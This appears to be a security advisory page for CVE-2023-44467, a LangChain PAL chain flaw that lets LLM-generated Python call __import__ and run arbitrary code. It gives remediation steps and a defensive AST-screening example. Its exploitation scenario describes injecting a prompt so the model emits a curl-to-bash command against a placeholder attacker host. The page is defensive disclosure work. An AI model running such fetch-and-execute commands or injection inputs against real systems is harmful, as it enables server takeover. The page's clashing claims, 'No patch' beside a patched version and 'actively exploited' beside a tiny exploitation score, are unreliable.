CVE-2023-44467: LangChain: RCE bypass via __import__ in PAL chain

CRITICAL ACTIVELY EXPLOITED PoC AVAILABLE
Published October 9, 2023
CISO Take

If you run any LangChain application using the PAL (Program-Aided Language) chain, you have an unauthenticated RCE vulnerability that bypasses the prior CVE-2023-36258 patch. Upgrade langchain_experimental to >=0.0.306 immediately. Any deployment accepting user-controlled input to PAL chains should be treated as fully compromised until patched.

Risk Assessment

Critical risk. CVSS 9.8 reflects the worst-case combination: network-accessible, zero privileges required, zero user interaction, and full C/I/A compromise. The bypass nature — circumventing a prior fix — signals active adversarial research into escape paths, increasing the probability of in-the-wild exploitation. LangChain's widespread enterprise adoption in AI pipelines and internal tooling significantly amplifies the attack surface.

Affected Systems

Package Ecosystem Vulnerable Range Patched
langchain_experimental pip No patch

Do you use langchain_experimental? You're affected.

Severity & Risk

CVSS 3.1: 9.8 / 10
EPSS: 0.1% chance of exploitation in 30 days (higher than 34% of all CVEs)
Exploitation Status: Actively Exploited
Sophistication: Trivial
Exploitation Confidence: high
CISA KEV (active exploitation confirmed)
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV: Network
AC: Low
PR: None
UI: None
S: Unchanged
C: High
I: High
A: High

Recommended Action

  1. Patch: Upgrade langchain_experimental to >=0.0.306 immediately — no workaround is reliable.

  2. Audit: Identify all applications using PAL chain (grep for 'pal_chain', 'PALChain', or 'from langchain_experimental.pal_chain').

  3. Isolate: If patching is delayed, disable PAL chain endpoints or restrict them to trusted internal networks only.

  4. Sandbox: Run PAL chain execution in a hardened sandbox (gVisor, Firecracker, or restricted Docker with no network egress and read-only filesystem).

  5. Monitor: Alert on unexpected process spawning from Python processes running LangChain.

  6. Rotate credentials: Assume all API keys and secrets accessible to affected instances are compromised if exposed externally.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act: Art. 15 - Accuracy, Robustness and Cybersecurity
ISO 42001: A.6.2.5 - AI System Security Controls
NIST AI RMF: MANAGE-2.2 - Risk Treatment — AI Risk Mitigation
OWASP LLM Top 10: LLM01 - Prompt Injection; LLM02 - Insecure Output Handling

Frequently Asked Questions

What is CVE-2023-44467?

If you run any LangChain application using the PAL (Program-Aided Language) chain, you have an unauthenticated RCE vulnerability that bypasses the prior CVE-2023-36258 patch. Upgrade langchain_experimental to >=0.0.306 immediately. Any deployment accepting user-controlled input to PAL chains should be treated as fully compromised until patched.

Is CVE-2023-44467 actively exploited?

Yes, CVE-2023-44467 is confirmed actively exploited and is listed in the CISA Known Exploited Vulnerabilities catalog.

How to fix CVE-2023-44467?

  1. Patch: Upgrade langchain_experimental to >=0.0.306 immediately — no workaround is reliable.

  2. Audit: Identify all applications using PAL chain (grep for 'pal_chain', 'PALChain', or 'from langchain_experimental.pal_chain').

  3. Isolate: If patching is delayed, disable PAL chain endpoints or restrict them to trusted internal networks only.

  4. Sandbox: Run PAL chain execution in a hardened sandbox (gVisor, Firecracker, or restricted Docker with no network egress and read-only filesystem).

  5. Monitor: Alert on unexpected process spawning from Python processes running LangChain.

  6. Rotate credentials: Assume all API keys and secrets accessible to affected instances are compromised if exposed externally.

What systems are affected by CVE-2023-44467?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, LLM reasoning pipelines, code-executing AI agents, PAL chain deployments, AI coding and math assistants.

What is the CVSS score for CVE-2023-44467?

CVE-2023-44467 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 0.14%.

Technical Details

NVD Description

langchain_experimental (aka LangChain Experimental) in LangChain before 0.0.306 allows an attacker to bypass the CVE-2023-36258 fix and execute arbitrary code via __import__ in Python code, which is not prohibited by pal_chain/base.py.

Exploitation Scenario

An attacker sends a crafted natural language query to a LangChain application using PAL chain — for example, a math reasoning assistant or agentic tool. The PAL chain prompts the LLM to generate Python code to solve the query. The attacker's input is designed to cause the LLM to include '__import__("os").system("curl attacker.com/shell.sh | bash")' or similar in the generated code. Because pal_chain/base.py's sanitization blocklist does not prohibit __import__, the code executes unobstructed on the server, granting full RCE with the process's privileges. No authentication, no special access — one HTTP request is sufficient.
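
The gap described above, as an added example that is not LangChain's code: a simplified model of a validator that only rejects import statements, beside a stricter AST screen that also rejects the `__import__` builtin and dunder access. The function names, the `BLOCKED_NAMES` set and the sample strings are assumptions constructed for illustration; the samples call only `os.getcwd()`.

```python
import ast

# Constructed samples standing in for LLM-generated PAL solutions.
BENIGN = "def solution():\n    return sum(range(10))\n"
IMPORT_STMT = "import os\ndef solution():\n    return os.getcwd()\n"
DUNDER_CALL = "def solution():\n    return __import__('os').getcwd()\n"
ALIASED = ("def solution():\n"
           "    f = __builtins__.__dict__['__import__']\n"
           "    return f('os').getcwd()\n")

# Assumed blocklist for this example; a real deployment should prefer an allowlist.
BLOCKED_NAMES = {"__import__", "__builtins__", "eval", "exec", "compile",
                 "open", "getattr", "globals", "locals", "vars"}


def import_statements_only(code: str) -> list[str]:
    """Simplified model of a check that only looks for import statements."""
    return [f"line {n.lineno}: import statement"
            for n in ast.walk(ast.parse(code))
            if isinstance(n, (ast.Import, ast.ImportFrom))]


def hardened_findings(code: str) -> list[str]:
    """Also flags blocked builtin names and any dunder attribute or string."""
    findings = import_statements_only(code)
    for n in ast.walk(ast.parse(code)):
        if isinstance(n, ast.Name) and n.id in BLOCKED_NAMES:
            findings.append(f"line {n.lineno}: name {n.id}")
        elif isinstance(n, ast.Attribute) and n.attr.startswith("__"):
            findings.append(f"line {n.lineno}: attribute {n.attr}")
        elif (isinstance(n, ast.Constant) and isinstance(n.value, str)
              and n.value.startswith("__")):
            findings.append(f"line {n.lineno}: string {n.value!r}")
    return findings


if __name__ == "__main__":
    # Static screening is defence in depth only; the sandbox step still applies.
    for label, code in [("benign", BENIGN), ("import stmt", IMPORT_STMT),
                        ("__import__ call", DUNDER_CALL), ("aliased", ALIASED)]:
        print(f"{label}: weak={import_statements_only(code)} "
              f"hardened={hardened_findings(code)}")
```

The weak check returns no findings for `DUNDER_CALL`, which is the class of bypass the NVD description refers to; a screen like the hardened one belongs in front of execution, not in place of the upgrade or the sandbox.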

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Timeline

Published: October 9, 2023
Last Modified: November 21, 2024
First Seen: October 9, 2023

Related Vulnerabilities